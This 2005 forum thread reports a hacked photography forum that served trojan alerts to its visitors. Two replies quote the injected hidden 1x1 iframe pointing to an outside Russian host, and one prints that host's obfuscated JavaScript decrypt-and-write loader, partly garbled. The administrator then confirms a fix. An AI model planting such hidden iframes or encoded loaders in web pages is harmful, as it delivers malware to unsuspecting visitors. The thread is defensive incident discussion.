Ad
Ad
Ad
Pages: [1]   Bottom of Page
Print
Author Topic: Trojan Horse Warning  (Read 5179 times)
Jack Flesher
Sr. Member
****
Offline Offline

Posts: 2595



WWW
« on: November 20, 2005, 12:03:39 PM »
ReplyReply

FWIW -- My virus detector signals a trojan horse virus every time I log into the user forums...
Logged

schaubild
Full Member
***
Offline Offline

Posts: 141


« Reply #1 on: November 20, 2005, 12:11:02 PM »
ReplyReply

Same with me. The site tries to run a file named load.exe...  
Logged
francois
Sr. Member
****
Offline Offline

Posts: 6870


« Reply #2 on: November 20, 2005, 12:18:59 PM »
ReplyReply

With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
« Last Edit: November 20, 2005, 12:23:12 PM by francois » Logged

Francois
Peter McLennan
Sr. Member
****
Offline Offline

Posts: 1695


« Reply #3 on: November 20, 2005, 12:45:20 PM »
ReplyReply

Quote
With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
[a href=\"index.php?act=findpost&pid=51780\"][{POST_SNAPBACK}][/a]


This morning I'm getting a blocked popup warning when I go to "view new posts".  Never seen that here before.

Peter
Logged
Concorde-SST
Full Member
***
Offline Offline

Posts: 102


« Reply #4 on: November 20, 2005, 12:48:11 PM »
ReplyReply

Hello -

Im from Europe and I never had such problems
with this website.

Im using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
Logged
Gary Brown
Full Member
***
Offline Offline

Posts: 211


« Reply #5 on: November 20, 2005, 12:49:57 PM »
ReplyReply

In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
Logged
Ben Rubinstein
Sr. Member
****
Offline Offline

Posts: 1733


« Reply #6 on: November 20, 2005, 12:59:47 PM »
ReplyReply

Yup, I've been getting that, I've had my virus program block it but it still opens an empty window and tries to load the link Gary mentioned.
Logged

francois
Sr. Member
****
Offline Offline

Posts: 6870


« Reply #7 on: November 20, 2005, 01:01:43 PM »
ReplyReply

Quote
Hello -

Im from Europe and I never had such problems
with this website.

Im using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
[a href=\"index.php?act=findpost&pid=51784\"][{POST_SNAPBACK}][/a]

I'm also in Europe and using a Mac with Safari. As soon as the forum page loads, Safari closes the window. I tried to clear the caches & cookies and it helped somewhat but now it does it again.
     
Logged

Francois
francois
Sr. Member
****
Offline Offline

Posts: 6870


« Reply #8 on: November 20, 2005, 01:03:53 PM »
ReplyReply

Quote
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
[a href=\"index.php?act=findpost&pid=51785\"][{POST_SNAPBACK}][/a]


If I load the offending url, Safari (on the Mac) closes the window immediately. Using curl shows the hacked  source leading to the Russian address.

"Hacked" LL forum source:
<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape &amp; Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>



"Russian" page source:
<script language=JavaScript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57,
45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3
9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv
_Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW")
</script>
« Last Edit: November 20, 2005, 01:12:39 PM by francois » Logged

Francois
Mark Guertin
Administrator
Full Member
*****
Offline Offline

Posts: 233



« Reply #9 on: November 20, 2005, 01:33:27 PM »
ReplyReply

Thanks guys.

This has been fixed.  Someone found a way to trigger an unwanted password reset.

So no more trojan and I'm looking into how the password reset was triggered so they can't use this method to gain access any longer.

Mark

P.S. Thanks for the extra info in this thread, made it much easier to track down as I'm also on Safari on a Mac
Logged
Pages: [1]   Top of Page
Print
Jump to:  

Ad
Ad
Ad